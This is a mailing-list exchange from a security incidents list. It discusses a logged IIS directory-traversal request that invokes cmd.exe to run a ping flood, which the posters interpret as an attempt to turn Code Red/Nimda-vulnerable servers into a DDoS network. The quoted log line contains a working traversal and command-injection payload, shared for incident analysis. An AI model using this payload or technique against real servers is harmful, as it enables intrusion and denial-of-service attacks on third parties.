Security Incidents: Re: Interesting new DDoS method?

[zeno <bugtraq () cgisecurity net>]

The idea of webserver/web app holes for use with launching ddos isn't a new idea.
Some people have even written cgi programs which are soly made for flooding for later
use. I do think this will become a very popular method of launching ddos attacks on the
otherhand.
 

- zeno () cgisecurity com



> Exerpt from webserver logs:
>
> /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping%20-n%20666%20-l%2065500%20-w%200%2065.168.118.157 200 
> Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
>
> We had several of these appear in the logs.  Decyphering the command that was attempted, it looks like: ping -n 666 
> -l 65000 -w 0
>
> It looks like someone's attempting to take advantage of code red / nimda infected (or vulnerable) servers to use as a 
> Distributed DoS.  Quite clever.  All one would have to do is sit and accumulate a list of machines that have 
> attempted to probe you for CR/CRv2/Nimda etc...
>
> Scripting an attack like this would be quite simple.  However, the machines that were probed here, were not infected 
> or vulnerable.
>
>
> Keith T. Morgan - CISSP, CCSE/CCSA, MCP
> Terradon Communications Group
> Office: 304.755.1324 x142
> Mobile: 304.415.0238
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com